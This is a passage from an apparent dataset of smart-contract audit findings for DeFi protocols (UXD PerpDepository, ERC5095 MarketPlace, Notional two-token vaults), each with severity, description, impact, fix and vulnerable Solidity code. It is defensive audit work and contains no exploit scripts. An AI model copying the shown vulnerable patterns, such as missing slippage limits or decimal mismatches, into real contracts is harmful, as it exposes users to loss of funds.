function.",Add a protection parameter to the function `rebalanceLite()` so that the user can specify the minimum out amount.,Users can lose funds while lite rebalancing.,"```\\nPerpDepository.sol\\n function rebalanceLite(\\n uint256 amount,\\n int8 polarity,\\n uint160 sqrtPriceLimitX96,\\n address account\\n ) external nonReentrant returns (uint256, uint256) {\\n if (polarity == -1) {\\n return\\n _rebalanceNegativePnlLite(amount, sqrtPriceLimitX96, account);\\n } else if (polarity == 1) {\\n // disable rebalancing positive PnL\\n revert PositivePnlRebalanceDisabled(msg.sender);\\n // return _rebalancePositivePnlLite(amount, sqrtPriceLimitX96, account);\\n } else {\\n revert InvalidRebalance(polarity);\\n }\\n }\\n function _rebalanceNegativePnlLite(\\n uint256 amount,\\n uint160 sqrtPriceLimitX96,\\n address account\\n ) private returns (uint256, uint256) {\\n uint256 normalizedAmount = amount.fromDecimalToDecimal(\\n ERC20(quoteToken).decimals(),\\n 18\\n );\\n _checkNegativePnl(normalizedAmount);\\n IERC20(quoteToken).transferFrom(account, address(this), amount);\\n IERC20(quoteToken).approve(address(vault), amount);\\n vault.deposit(quoteToken, amount);\\n bool isShort = false;\\n bool amountIsInput = true;\\n (uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n );\\n vault.withdraw(assetToken, baseAmount);\\n IERC20(assetToken).transfer(account, baseAmount);\\n emit Rebalanced(baseAmount, quoteAmount, 0);\\n return (baseAmount, quoteAmount);\\n }\\n```\\n" +`PerpDepository._rebalanceNegativePnlWithSwap()` shouldn't use a `sqrtPriceLimitX96` twice.,medium,"`PerpDepository._rebalanceNegativePnlWithSwap()` shouldn't use a `sqrtPriceLimitX96` twice.\\nCurrently, `_rebalanceNegativePnlWithSwap()` uses a `sqrtPriceLimitX96` param twice for placing a perp order and swapping.\\n```\\n function _rebalanceNegativePnlWithSwap(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n address account\\n ) private returns (uint256, uint256) {\\n uint256 normalizedAmount = amount.fromDecimalToDecimal(\\n ERC20(quoteToken).decimals(),\\n 18\\n );\\n _checkNegativePnl(normalizedAmount);\\n bool isShort = false;\\n bool amountIsInput = true;\\n (uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n );\\n vault.withdraw(assetToken, baseAmount);\\n SwapParams memory params = SwapParams({\\n tokenIn: assetToken,\\n tokenOut: quoteToken,\\n amountIn: baseAmount,\\n amountOutMinimum: amountOutMinimum,\\n sqrtPriceLimitX96: sqrtPriceLimitX96, //@audit \\n poolFee: swapPoolFee\\n });\\n uint256 quoteAmountOut = spotSwapper.swapExactInput(params);\\n```\\n\\nIn `_placePerpOrder()`, it uses the uniswap pool inside the perp protocol and uses a `spotSwapper` for the second swap which is for the uniswap as well.\\nBut as we can see here, Uniswap V3 introduces multiple pools for each token pair and 2 pools might be different and I think it's not good to use the same `sqrtPriceLimitX96` for different pools.\\nAlso, I think it's not mandatory to check a `sqrtPriceLimitX96` as it checks `amountOutMinimum` already. (It checks `amountOutMinimum` only in `_openLong()` and _openShort().)",I think we can use the `sqrtPriceLimitX96` param for one pool only and it would be enough as there is an `amountOutMinimum` condition.,`PerpDepository._rebalanceNegativePnlWithSwap()` might revert when it should work as it uses the same `sqrtPriceLimitX96` for different pools.,"```\\n function _rebalanceNegativePnlWithSwap(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n address account\\n ) private returns (uint256, uint256) {\\n uint256 normalizedAmount = amount.fromDecimalToDecimal(\\n ERC20(quoteToken).decimals(),\\n 18\\n );\\n _checkNegativePnl(normalizedAmount);\\n bool isShort = false;\\n bool amountIsInput = true;\\n (uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n );\\n vault.withdraw(assetToken, baseAmount);\\n SwapParams memory params = SwapParams({\\n tokenIn: assetToken,\\n tokenOut: quoteToken,\\n amountIn: baseAmount,\\n amountOutMinimum: amountOutMinimum,\\n sqrtPriceLimitX96: sqrtPriceLimitX96, //@audit \\n poolFee: swapPoolFee\\n });\\n uint256 quoteAmountOut = spotSwapper.swapExactInput(params);\\n```\\n" +Vulnerable GovernorVotesQuorumFraction version,medium,"The protocol uses an OZ version of contracts that contain a known vulnerability in government contracts.\\n`UXDGovernor` contract inherits from GovernorVotesQuorumFraction:\\n```\\n contract UXDGovernor is\\n ReentrancyGuard,\\n Governor,\\n GovernorVotes,\\n GovernorVotesQuorumFraction,\\n GovernorTimelockControl,\\n GovernorCountingSimple,\\n GovernorSettings\\n```\\n\\nIt was patched in version 4.7.2, but this protocol uses an older version: ""@openzeppelin/contracts"": ""^4.6.0""",Update the OZ version of contracts to version >=4.7.2 or at least follow the workarounds of OZ if not possible otherwise.,"The potential impact is described in the OZ advisory. This issue was assigned with a severity of High from OZ, so I am sticking with it in this submission.","```\\n contract UXDGovernor is\\n ReentrancyGuard,\\n Governor,\\n GovernorVotes,\\n GovernorVotesQuorumFraction,\\n GovernorTimelockControl,\\n GovernorCountingSimple,\\n GovernorSettings\\n```\\n" +Deposit and withdraw to the vault with the wrong decimals of amount in contract `PerpDepository`,medium,"Function `vault.deposit` and `vault.withdraw` of vault in contract `PerpDepository` need to be passed with the amount in raw decimal of tokens (is different from 18 in case using USDC, WBTC, ... as base and quote tokens). But some calls miss the conversion of decimals from 18 to token's decimal, and pass wrong decimals into them.\\nFunction `vault.deposit` need to be passed the param amount in token's decimal (as same as vault.withdraw). You can see at function `_depositAsset` in contract PerpDepository.\\n```\\nfunction _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n \\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n}\\n```\\n\\nBut there are some calls of `vault.deposit` and `vault.withdraw` that passed the amount in the wrong decimal (18 decimal). Let's see function `_rebalanceNegativePnlWithSwap` in contract PerpDepository:\\n```\\nfunction _rebalanceNegativePnlWithSwap(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n address account\\n) private returns (uint256, uint256) {\\n // rest of code\\n (uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n );\\n vault.withdraw(assetToken, baseAmount); \\n \\n // rest of code\\n \\n vault.deposit(quoteToken, quoteAmount);\\n\\n emit Rebalanced(baseAmount, quoteAmount, shortFall);\\n return (baseAmount, quoteAmount);\\n}\\n```\\n\\nBecause function `_placePerpOrder` returns in decimal 18 (confirmed with sponsor WarTech), this calls pass `baseAmount` and `quoteAmount` in decimal 18, inconsistent with the above call. It leads to vault using the wrong decimal when depositing and withdrawing tokens.\\nThere is another case that use `vault.withdraw` with the wrong decimal (same as this case) in function _rebalanceNegativePnlLite:\\n```\\n//function _rebalanceNegativePnlLite, contract PerpDepository\\n// rest of code\\n\\n(uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n);\\nvault.withdraw(assetToken, baseAmount);\\n\\n// rest of code\\n```\\n",Should convert the param `amount` from token's decimal to decimal 18 before `vault.deposit` and `vault.withdraw`.,"Because of calling `vault.deposit` and `vault.withdraw` with the wrong decimal of the param amount, the protocol can lose a lot of funds. And some functionalities of the protocol can be broken cause it can revert by not enough allowance when calling these functions.","```\\nfunction _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n \\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n}\\n```\\n" +Price disparities between spot and perpetual pricing can heavily destabilize UXD,medium,"When minting UXD using PerpDepository.sol the amount of UXD minted corresponds to the amount of vUSD gained from selling the deposited ETH. This is problematic given that Perp Protocol is a derivative rather than a spot market, which means that price differences cannot be directly arbitraged with spot markets. The result is that derivative markets frequently trade at a price higher or lower than the spot price. The result of this is that UXD is actually pegged to vUSD rather than USD. This key difference can cause huge strain on a USD peg and likely depegging.\\n```\\nfunction deposit(\\n address asset,\\n uint256 amount\\n) external onlyController returns (uint256) {\\n if (asset == assetToken) {\\n _depositAsset(amount);\\n (, uint256 quoteAmount) = _openShort(amount);\\n return quoteAmount; // @audit this mint UXD equivalent to the amount of vUSD gained\\n } else if (asset == quoteToken) {\\n return _processQuoteMint(amount);\\n } else {\\n revert UnsupportedAsset(asset);\\n }\\n}\\n```\\n\\nPerpDepository#deposit shorts the deposit amount and returns the amount of vUSD resulting from the swap, which effectively pegs it to vUSD rather than USD. When the perpetual is trading at a premium arbitrage will begin happening between the spot and perpetual asset and the profit will be taken at the expense of the UXD peg.\\nExample: Imagine markets are heavily trending with a spot price of $1500 and a perpetual price of $1530. A user can now buy 1 ETH for $1500 and deposit it to mint 1530 UXD. They can then swap the UXD for 1530 USDC (or other stablecoin) for a profit of $30. The user can continue to do this until either the perpetual price is arbitraged down to $1500 or the price of UXD is $0.98.","I recommend integrating with a chainlink oracle and using its price to determine the true spot price of ETH. When a user mints make sure that the amount minted is never greater than the spot price of ETH which will prevent the negative pressure on the peg:\\n```\\nfunction deposit(\\n address asset,\\n uint256 amount\\n) external onlyController returns (uint256) {\\n if (asset == assetToken) {\\n _depositAsset(amount);\\n (, uint256 quoteAmount) = _openShort(amount);\\n\\n+ spotPrice = assetOracle.getPrice();\\n+ assetSpotValue = amount.mulwad(spotPrice);\\n\\n- return quoteAmount;\\n+ return quoteAmount <= assetSpotValue ? quoteAmount: assetSpotValue;\\n } else if (asset == quoteToken) {\\n return _processQuoteMint(amount);\\n } else {\\n revert UnsupportedAsset(asset);\\n }\\n}\\n```\\n",UXD is pegged to vUSD rather than USD which can cause instability and loss of peg,"```\\nfunction deposit(\\n address asset,\\n uint256 amount\\n) external onlyController returns (uint256) {\\n if (asset == assetToken) {\\n _depositAsset(amount);\\n (, uint256 quoteAmount) = _openShort(amount);\\n return quoteAmount; // @audit this mint UXD equivalent to the amount of vUSD gained\\n } else if (asset == quoteToken) {\\n return _processQuoteMint(amount);\\n } else {\\n revert UnsupportedAsset(asset);\\n }\\n}\\n```\\n" +PerpDepository#_placePerpOrder miscalculates fees paid when shorting,medium,"PerpDepository#_placePerpOrder calculates the fee as a percentage of the quoteToken received. The issue is that this amount already has the fees taken so the fee percentage is being applied incorrectly.\\n```\\nfunction _placePerpOrder(\\n uint256 amount,\\n bool isShort,\\n bool amountIsInput,\\n uint160 sqrtPriceLimit\\n) private returns (uint256, uint256) {\\n uint256 upperBound = 0; // 0 = no limit, limit set by sqrtPriceLimit\\n\\n IClearingHouse.OpenPositionParams memory params = IClearingHouse\\n .OpenPositionParams({\\n baseToken: market,\\n isBaseToQuote: isShort, // true for short\\n isExactInput: amountIsInput, // we specify exact input amount\\n amount: amount, // collateral amount - fees\\n oppositeAmountBound: upperBound, // output upper bound\\n // solhint-disable-next-line not-rely-on-time\\n deadline: block.timestamp,\\n sqrtPriceLimitX96: sqrtPriceLimit, // max slippage\\n referralCode: 0x0\\n });\\n\\n (uint256 baseAmount, uint256 quoteAmount) = clearingHouse.openPosition(\\n params\\n );\\n\\n uint256 feeAmount = _calculatePerpOrderFeeAmount(quoteAmount);\\n totalFeesPaid += feeAmount;\\n\\n emit PositionOpened(isShort, amount, amountIsInput, sqrtPriceLimit);\\n return (baseAmount, quoteAmount);\\n}\\n\\nfunction _calculatePerpOrderFeeAmount(uint256 amount)\\n internal\\n view\\n returns (uint256)\\n{\\n return amount.mulWadUp(getExchangeFeeWad());\\n}\\n```\\n\\nWhen calculating fees, `PerpDepository#_placePerpOrder` use the quote amount retuned when opening the new position. It always uses exactIn which means that for shorts the amount of baseAsset being sold is specified. The result is that quote amount returned is already less the fees. If we look at how the fee is calculated we can see that it is incorrect.\\nExample: Imagine the market price of ETH is $1000 and there is a market fee of 1%. The 1 ETH is sold and the contract receives 990 USD. Using the math above it would calculated the fee as $99 (990 * 1%) but actually the fee is $100.\\nIt have submitted this as a medium because it is not clear from the given contracts what the fee totals are used for and I cannot fully assess the implications of the fee value being incorrect.","Rewrite _calculatePerpOrderFeeAmount to correctly calculate the fees paid:\\n```\\n- function _calculatePerpOrderFeeAmount(uint256 amount)\\n+ function _calculatePerpOrderFeeAmount(uint256 amount, bool isShort)\\n internal\\n view\\n returns (uint256)\\n {\\n+ if (isShort) {\\n+ return amount.divWadDown(WAD - getExchangeFeeWad()) - amount;\\n+ } else {\\n return amount.mulWadUp(getExchangeFeeWad());\\n+ }\\n }\\n```\\n",totalFeesPaid will be inaccurate which could lead to disparities in other contracts depending on how it is used,"```\\nfunction _placePerpOrder(\\n uint256 amount,\\n bool isShort,\\n bool amountIsInput,\\n uint160 sqrtPriceLimit\\n) private returns (uint256, uint256) {\\n uint256 upperBound = 0; // 0 = no limit, limit set by sqrtPriceLimit\\n\\n IClearingHouse.OpenPositionParams memory params = IClearingHouse\\n .OpenPositionParams({\\n baseToken: market,\\n isBaseToQuote: isShort, // true for short\\n isExactInput: amountIsInput, // we specify exact input amount\\n amount: amount, // collateral amount - fees\\n oppositeAmountBound: upperBound, // output upper bound\\n // solhint-disable-next-line not-rely-on-time\\n deadline: block.timestamp,\\n sqrtPriceLimitX96: sqrtPriceLimit, // max slippage\\n referralCode: 0x0\\n });\\n\\n (uint256 baseAmount, uint256 quoteAmount) = clearingHouse.openPosition(\\n params\\n );\\n\\n uint256 feeAmount = _calculatePerpOrderFeeAmount(quoteAmount);\\n totalFeesPaid += feeAmount;\\n\\n emit PositionOpened(isShort, amount, amountIsInput, sqrtPriceLimit);\\n return (baseAmount, quoteAmount);\\n}\\n\\nfunction _calculatePerpOrderFeeAmount(uint256 amount)\\n internal\\n view\\n returns (uint256)\\n{\\n return amount.mulWadUp(getExchangeFeeWad());\\n}\\n```\\n" +PerpDepository.netAssetDeposits variable can prevent users to withdraw with underflow error,medium,"PerpDepository.netAssetDeposits variable can prevent users to withdraw with underflow error\\n```\\n function _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n\\n\\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n }\\n```\\n\\n```\\n function _withdrawAsset(uint256 amount, address to) private {\\n if (amount > netAssetDeposits) {\\n revert InsufficientAssetDeposits(netAssetDeposits, amount);\\n }\\n netAssetDeposits -= amount;\\n\\n\\n vault.withdraw(address(assetToken), amount);\\n IERC20(assetToken).transfer(to, amount);\\n }\\n```\\n\\nThe problem here is that when user deposits X assets, then he receives Y UXD tokens. And when later he redeems his Y UXD tokens he can receive more or less than X assets. This can lead to situation when netAssetDeposits variable will be seting to negative value which will revert tx.\\nExample. 1.User deposits 1 WETH when it costs 1200$. As result 1200 UXD tokens were minted and netAssetDeposits was set to 1. 2.Price of WETH has decreased and now it costs 1100. 3.User redeem his 1200 UXD tokens and receives from perp protocol 1200/1100=1.09 WETH. But because netAssetDeposits is 1, then transaction will revert inside `_withdrawAsset` function with underflow error.","As you don't use this variable anywhere else, you can remove it. Otherwise you need to have 2 variables instead: totalDeposited and totalWithdrawn.",User can't redeem all his UXD tokens.,"```\\n function _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n\\n\\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n }\\n```\\n" +ERC5095 has not approved MarketPlace to spend tokens in ERC5095,medium,"ERC5095 requires approving MarketPlace to spend the tokens in ERC5095 before calling MarketPlace.sellUnderlying/sellPrincipalToken\\nMarketPlace.sellUnderlying/sellPrincipalToken will call transferFrom to send tokens from msg.sender to pool, which requires msg.sender to approve MarketPlace. However, before calling MarketPlace.sellUnderlying/sellPrincipalToken in ERC5095, there is no approval for MarketPlace to spend the tokens in ERC5095, which causes functions such as ERC5095.deposit/mint/withdraw/redeem functions fail, i.e. users cannot sell tokens through ERC5095.\\n```\\n function sellUnderlying(\\n address u,\\n uint256 m,\\n uint128 a,\\n uint128 s\\n ) external returns (uint128) {\\n // Get the pool for the market\\n IPool pool = IPool(pools[u][m]);\\n\\n // Get the number of PTs received for selling `a` underlying tokens\\n uint128 expected = pool.sellBasePreview(a);\\n\\n // Verify slippage does not exceed the one set by the user\\n if (expected < s) {\\n revert Exception(16, expected, 0, address(0), address(0));\\n }\\n\\n // Transfer the underlying tokens to the pool\\n Safe.transferFrom(IERC20(pool.base()), msg.sender, address(pool), a);\\n// rest of code\\n function sellPrincipalToken(\\n address u,\\n uint256 m,\\n uint128 a,\\n uint128 s\\n ) external returns (uint128) {\\n // Get the pool for the market\\n IPool pool = IPool(pools[u][m]);\\n\\n // Preview amount of underlying received by selling `a` PTs\\n uint256 expected = pool.sellFYTokenPreview(a);\\n\\n // Verify that the amount needed does not exceed the slippage parameter\\n if (expected < s) {\\n revert Exception(16, expected, s, address(0), address(0));\\n }\\n\\n // Transfer the principal tokens to the pool\\n Safe.transferFrom(\\n IERC20(address(pool.fyToken())),\\n msg.sender,\\n address(pool),\\n a\\n );\\n```\\n\\nIn the test file, `vm.startPrank(address(token))` is used and approves the MarketPlace, which cannot be done in the mainnet\\n```\\n vm.startPrank(address(token));\\n IERC20(Contracts.USDC).approve(address(marketplace), type(uint256).max);\\n IERC20(Contracts.YIELD_TOKEN).approve(\\n address(marketplace),\\n type(uint256).max\\n );\\n```\\n","Approve MarketPlace to spend tokens in ERC5095 in ERC5095.setPool.\\n```\\n function setPool(address p)\\n external\\n authorized(marketplace)\\n returns (bool)\\n {\\n pool = p.fyToken();\\n// Add the line below\\n Safe.approve(IERC20(underlying), marketplace, type(uint256).max);\\n// Add the line below\\n Safe.approve(IERC20(p.), marketplace, type(uint256).max);\\n\\n return true;\\n }\\n\\n pool = address(0);\\n }\\n```\\n","It makes functions such as ERC5095.deposit/mint/withdraw/redeem functions fail, i.e. users cannot sell tokens through ERC5095.","```\\n function sellUnderlying(\\n address u,\\n uint256 m,\\n uint128 a,\\n uint128 s\\n ) external returns (uint128) {\\n // Get the pool for the market\\n IPool pool = IPool(pools[u][m]);\\n\\n // Get the number of PTs received for selling `a` underlying tokens\\n uint128 expected = pool.sellBasePreview(a);\\n\\n // Verify slippage does not exceed the one set by the user\\n if (expected < s) {\\n revert Exception(16, expected, 0, address(0), address(0));\\n }\\n\\n // Transfer the underlying tokens to the pool\\n Safe.transferFrom(IERC20(pool.base()), msg.sender, address(pool), a);\\n// rest of code\\n function sellPrincipalToken(\\n address u,\\n uint256 m,\\n uint128 a,\\n uint128 s\\n ) external returns (uint128) {\\n // Get the pool for the market\\n IPool pool = IPool(pools[u][m]);\\n\\n // Preview amount of underlying received by selling `a` PTs\\n uint256 expected = pool.sellFYTokenPreview(a);\\n\\n // Verify that the amount needed does not exceed the slippage parameter\\n if (expected < s) {\\n revert Exception(16, expected, s, address(0), address(0));\\n }\\n\\n // Transfer the principal tokens to the pool\\n Safe.transferFrom(\\n IERC20(address(pool.fyToken())),\\n msg.sender,\\n address(pool),\\n a\\n );\\n```\\n" +Two token vault will be broken if it comprises tokens with different decimals,high,"A two token vault that comprises tokens with different decimals will have many of its key functions broken. For instance, rewards cannot be reinvested and vault cannot be settled.\\nThe `Stable2TokenOracleMath._getSpotPrice` function is used to compute the spot price of two tokens.\\n```\\nFile: Stable2TokenOracleMath.sol\\nlibrary Stable2TokenOracleMath {\\n using TypeConvert for int256;\\n using Stable2TokenOracleMath for StableOracleContext;\\n\\n function _getSpotPrice(\\n StableOracleContext memory oracleContext, \\n TwoTokenPoolContext memory poolContext, \\n uint256 primaryBalance,\\n uint256 secondaryBalance,\\n uint256 tokenIndex\\n ) internal view returns (uint256 spotPrice) {\\n require(tokenIndex < 2); /// @dev invalid token index\\n\\n /// Apply scale factors\\n uint256 scaledPrimaryBalance = primaryBalance * poolContext.primaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n uint256 scaledSecondaryBalance = secondaryBalance * poolContext.secondaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n\\n /// @notice poolContext balances are always in BALANCER_PRECISION (1e18)\\n (uint256 balanceX, uint256 balanceY) = tokenIndex == 0 ?\\n (scaledPrimaryBalance, scaledSecondaryBalance) :\\n (scaledSecondaryBalance, scaledPrimaryBalance);\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, StableMath._balances(balanceX, balanceY), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice({\\n amplificationParameter: oracleContext.ampParam,\\n invariant: invariant,\\n balanceX: balanceX, \\n balanceY: balanceY\\n });\\n\\n /// Apply secondary scale factor in reverse\\n uint256 scaleFactor = tokenIndex == 0 ?\\n poolContext.secondaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.primaryScaleFactor :\\n poolContext.primaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.secondaryScaleFactor;\\n spotPrice = spotPrice * BalancerConstants.BALANCER_PRECISION / scaleFactor;\\n }\\n```\\n\\nTwo tokens (USDC and DAI) with different decimals will be used below to illustrate the issue:\\nUSDC/DAI Spot Price\\nAssume that the primary token is DAI (18 decimals) and the secondary token is USDC (6 decimals). As such, the scaling factors would be as follows. The token rate is ignored and set to 1 for simplicity.\\nPrimary Token (DAI)'s scaling factor = 1e18\\n`scaling factor = FixedPoint.ONE (1e18) * decimals difference to reach 18 decimals (1e0) * token rate (1)\\nscaling factor = 1e18`\\nSecondary Token (USDC)'s scaling factor = 1e30\\n`scaling factor = FixedPoint.ONE (1e18) * decimals difference to reach 18 decimals (1e12) * token rate (1)\\nscaling factor = 1e18 * 1e12 = 1e30`\\nAssume that the `primaryBalance` is 100 DAI (100e18), and the `secondaryBalance` is 100 USDC (100e6). Line 25 - 28 of the `_getSpotPrice` function will normalize the tokens balances to 18 decimals as follows:\\n`scaledPrimaryBalance` will be 100e18 (It remains the same as no scaling is needed because DAI is already denominated in 18 decimals)\\n`scaledPrimaryBalance = primaryBalance * poolContext.primaryScaleFactor / BalancerConstants.BALANCER_PRECISION;\\n`scaledPrimaryBalance` = 100e18 * 1e18 / 1e18\\n`scaledPrimaryBalance` = 100e18`\\n`scaledSecondaryBalance` will upscale to 100e18\\n`scaledSecondaryBalance` = `scaledSecondaryBalance` * poolContext.primaryScaleFactor / BalancerConstants.BALANCER_PRECISION;\\n`scaledSecondaryBalance` = 100e6 * 1e30 / 1e18\\n`scaledSecondaryBalance` = 100e18\\nThe `StableMath._calcSpotPrice` function at Line 39 returns the spot price of Y/X. In this example, `balanceX` is DAI, and `balanceY` is USDC. Thus, the spot price will be USDC/DAI. This means the amount of USDC I will get for each DAI.\\nWithin Balancer, all stable math calculations within the Balancer's pools are performed in `1e18`. With both the primary and secondary balances normalized to 18 decimals, they can be safely passed to the `StableMath._calculateInvariant` and `StableMath._calcSpotPrice` functions to compute the spot price. Assuming that the price of USDC and DAI is perfectly symmetric (1 DAI can be exchanged for exactly 1 USDC, and vice versa), the spot price returned from the `StableMath._calcSpotPrice` will be `1e18`. Note that the spot price returned by the `StableMath._calcSpotPrice` function will be denominated in 18 decimals.\\nIn Line 47-50 within the `Stable2TokenOracleMath._getSpotPrice` function, it attempts to downscale the spot price to normalize it back to the original decimals and token rate (e.g. stETH back to wstETH) of the token.\\nThe `scaleFactor` at Line 47 will be evaluated as follows:\\n```\\nscaleFactor = poolContext.secondaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.primaryScaleFactor\\nscaleFactor = 1e30 * 1e18 / 1e18\\nscaleFactor = 1e30\\n```\\n\\nFinally, the spot price will be scaled in reverse order and it will be evaluated to `1e6` as shown below:\\n```\\nspotPrice = spotPrice * BalancerConstants.BALANCER_PRECISION / scaleFactor;\\nspotPrice = 1e18 * 1e18 / 1e30\\nspotPrice = 1e6\\n```\\n\\nDAI/USDC Spot Price\\nIf it is the opposite where the primary token is USDC (6 decimals) and the secondary token is DAI (18 decimals), the calculation of the spot price will be as follows:\\nThe `scaleFactor` at Line 47 will be evaluated to as follows:\\n```\\nscaleFactor = poolContext.secondaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.primaryScaleFactor\\nscaleFactor = 1e18 * 1e18 / 1e30\\nscaleFactor = 1e6\\n```\\n\\nFinally, the spot price will be scaled in reverse order and it will be evaluated to `1e30` as shown below:\\n```\\nspotPrice = spotPrice * BalancerConstants.BALANCER_PRECISION / scaleFactor;\\nspotPrice = 1e18 * 1e18 / 1e6\\nspotPrice = 1e30\\n```\\n\\nNote about the spot price\\nAssuming that the spot price of USDC and DAI is 1:1. As shown above, if the decimals of two tokens are not the same, the final spot price will end up either 1e6 (USDC/DAI) or 1e30 (DAI/USDC). However, if the decimals of two tokens (e.g. wstETH and WETH) are the same, this issue stays hidden as the `scaleFactor` in Line 47 will always be 1e18 as both `secondaryScaleFactor` and `primaryScaleFactor` cancel out each other.\\nIt was observed that the spot price returned from the `Stable2TokenOracleMath._getSpotPrice` function is being compared with the oracle price from the `TwoTokenPoolUtils._getOraclePairPrice` function to determine if the pool has been manipulated within many functions.\\n```\\nuint256 oraclePrice = poolContext._getOraclePairPrice(strategyContext.tradingModule);\\n```\\n\\nBased on the implementation of the `TwoTokenPoolUtils._getOraclePairPrice` function , the `oraclePrice` returned by this function is always denominated in 18 decimals regardless of the decimals of the underlying tokens. For instance, assume the spot price of USDC (6 decimals) and DAI (18 decimals) is 1:1. The spot price returned by this oracle function for USDC/DAI will be `1e18` and DAI/USDC will be `1e18`.\\nIn many functions, the spot price returned from the `Stable2TokenOracleMath._getSpotPrice` function is compared with the oracle price via the `Stable2TokenOracleMath._checkPriceLimit`. Following is one such example. The `oraclePrice` will be `1e18`, while the `spotPrice` will be either `1e6` or `1e30` in our example. This will cause the `_checkPriceLimit` to always revert because of the large discrepancy between the two prices.\\n```\\nFile: Stable2TokenOracleMath.sol\\n function _getMinExitAmounts(\\n StableOracleContext calldata oracleContext,\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext calldata strategyContext,\\n uint256 oraclePrice,\\n uint256 bptAmount\\n ) internal view returns (uint256 minPrimary, uint256 minSecondary) {\\n // Oracle price is always specified in terms of primary, so tokenIndex == 0 for primary\\n // Validate the spot price to make sure the pool is not being manipulated\\n uint256 spotPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: poolContext.primaryBalance,\\n secondaryBalance: poolContext.secondaryBalance,\\n tokenIndex: 0\\n });\\n _checkPriceLimit(strategyContext, oraclePrice, spotPrice);\\n```\\n\\nOther affected functions include the following:\\nStable2TokenOracleMath._validateSpotPriceAndPairPrice\\nStable2TokenOracleMath._getTimeWeightedPrimaryBalance","Issue Two token vault will be broken if it comprises tokens with different decimals\\nWithin the `Stable2TokenOracleMath._getSpotPrice`, normalize the spot price back to 1e18 before returning the result. This ensures that it can be compared with the oracle price, which is denominated in 1e18 precision.\\nThis has been implemented in the spot price function (Boosted3TokenPoolUtils._getSpotPriceWithInvariant) of another pool (Boosted3Token). However, it was not consistently applied in `TwoTokenPool`.","A vault supporting tokens with two different decimals will have many of its key functions will be broken as the `_checkPriceLimit` will always revert. For instance, rewards cannot be reinvested and vaults cannot be settled since they rely on the `_checkPriceLimit` function.\\nIf the reward cannot be reinvested, the strategy tokens held by the users will not appreciate. If the vault cannot be settled, the vault debt cannot be repaid to Notional and the gain cannot be realized. Loss of assets for both users and Notional","```\\nFile: Stable2TokenOracleMath.sol\\nlibrary Stable2TokenOracleMath {\\n using TypeConvert for int256;\\n using Stable2TokenOracleMath for StableOracleContext;\\n\\n function _getSpotPrice(\\n StableOracleContext memory oracleContext, \\n TwoTokenPoolContext memory poolContext, \\n uint256 primaryBalance,\\n uint256 secondaryBalance,\\n uint256 tokenIndex\\n ) internal view returns (uint256 spotPrice) {\\n require(tokenIndex < 2); /// @dev invalid token index\\n\\n /// Apply scale factors\\n uint256 scaledPrimaryBalance = primaryBalance * poolContext.primaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n uint256 scaledSecondaryBalance = secondaryBalance * poolContext.secondaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n\\n /// @notice poolContext balances are always in BALANCER_PRECISION (1e18)\\n (uint256 balanceX, uint256 balanceY) = tokenIndex == 0 ?\\n (scaledPrimaryBalance, scaledSecondaryBalance) :\\n (scaledSecondaryBalance, scaledPrimaryBalance);\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, StableMath._balances(balanceX, balanceY), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice({\\n amplificationParameter: oracleContext.ampParam,\\n invariant: invariant,\\n balanceX: balanceX, \\n balanceY: balanceY\\n });\\n\\n /// Apply secondary scale factor in reverse\\n uint256 scaleFactor = tokenIndex == 0 ?\\n poolContext.secondaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.primaryScaleFactor :\\n poolContext.primaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.secondaryScaleFactor;\\n spotPrice = spotPrice * BalancerConstants.BALANCER_PRECISION / scaleFactor;\\n }\\n```\\n" +Rounding differences when computing the invariant,high,"The invariant used within Boosted3Token vault to compute the spot price is not aligned with the Balancer's ComposableBoostedPool due to rounding differences. The spot price is used to verify if the pool has been manipulated before executing certain key vault actions (e.g. settle vault, reinvest rewards). In the worst-case scenario, it might potentially fail to detect the pool has been manipulated as the spot price computed might be inaccurate.\\nThe Boosted3Token leverage vault relies on the old version of the `StableMath._calculateInvariant` that allows the caller to specify if the computation should round up or down via the `roundUp` 